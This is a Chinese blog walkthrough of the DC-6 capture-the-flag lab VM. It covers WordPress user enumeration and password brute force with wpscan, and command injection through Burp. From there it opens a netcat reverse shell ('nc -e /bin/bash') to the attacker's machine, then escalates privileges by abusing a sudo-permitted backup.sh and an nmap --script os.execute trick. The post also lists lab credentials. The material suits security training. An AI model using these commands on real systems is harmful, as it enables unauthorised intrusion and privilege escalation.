当前位置:网站首页>DC-6靶场下载及渗透实战详细过程(DC靶场系列)
DC-6靶场下载及渗透实战详细过程(DC靶场系列)
2022-08-03 03:36:00 【金 帛】
目录
DC-6靶场下载地址https://www.five86.com/downloads/DC-6.zip
一. 信息收集
1. 主机扫描
2. 端口扫描
3. 目录扫描
4. 页面信息探测
这里跟DC-2的情况一样,无法直接访问靶机主页面,得修改本地host重定向到wordy
在/etc/hosts文件下,添加
192.168.120.140 wordy
CMS是WordPress5.1.1,这里我们就可以利用针对工具wpscan进行渗透了
二. 渗透过程
1. 用户名枚举
wpscan --url wordy -e u
将得到的用户名,保存在一个文件里,方便稍后爆破
2. 爆破密码
根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > /root/桌面/passwd.txt
生成字典后,继续使用wpscan进行爆破
wpscan --url wordy -U uname.txt -P passwd.txt
成功爆破出一个用户
mark:helpdesk01
访问wp-login.php用该账号密码登入后台
3. 任意命令执行
burpsuite抓包,放到重复器, 修改报文
发现有命令回显,存在任意命令执行漏洞,接着我们反弹shell到kali上,先在kali监听端口9999
nc -lvp 9999
然后执行下面命令进行反弹shell
nc -e /bin/bash 192.168.120.129 9999
反弹shell成功,然后升级交互shell
python -c "import pty;pty.spawn('/bin/bash')"
4. 提权
之前打DC靶场能用的提权方式都试过了,不行,但跟上一关一样,在home目录下找到提示
得到一个账号,graham:Gso7isUM1D4
su graham
在找提权方法时发现
发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件
这是解压某个文件的操作,我们可以利用该文件,切换为jens用户
echo "/bin/bash" > b*
sudo -u jens ./*
发现可以利用nmap进行提权,参考nmap提权,先创建个文件
"os.execute('/bin/bash')" > shell
然后利用--script参数
sudo nmap --script=shell
提权成功
5. 查找flag
find / -name *flag.*
拿到flag
边栏推荐
猜你喜欢
随机推荐
网工知识角|华为网络工程师,华为、华三、思科设备三层交换机如何使用三层接口?命令敲起来
C# WPF设备监控软件(经典)-上篇
JWT入门学习
这个困扰程序员50年的问题,终于要被解决了?
Base64编码原理
IDEA如何创建同级工程
Summary of some questions about the grain mall
找不到符号@SuperBuilder,你以为真的是Lombok的问题?
ROS2自学笔记:机器视觉基础
DMA 的工作方式
Auto.js Pro write the first script hello world
【笔记】混淆矩阵和ROC曲线
iScroll系列之下拉刷新 + 上拉加载更多
基于flowable的upp(统一流程平台)运行性能优化(2)
22 ES6 knowledge points
成都高新南区 高新西区 东部新区 多边形范围点位 AOI 高德
vant-field中colon属性为true报错
高等代数_证明_矩阵乘以自身的转置的特征值不小于0
DOM破环和两个实验的复现
Senior ClickHouse -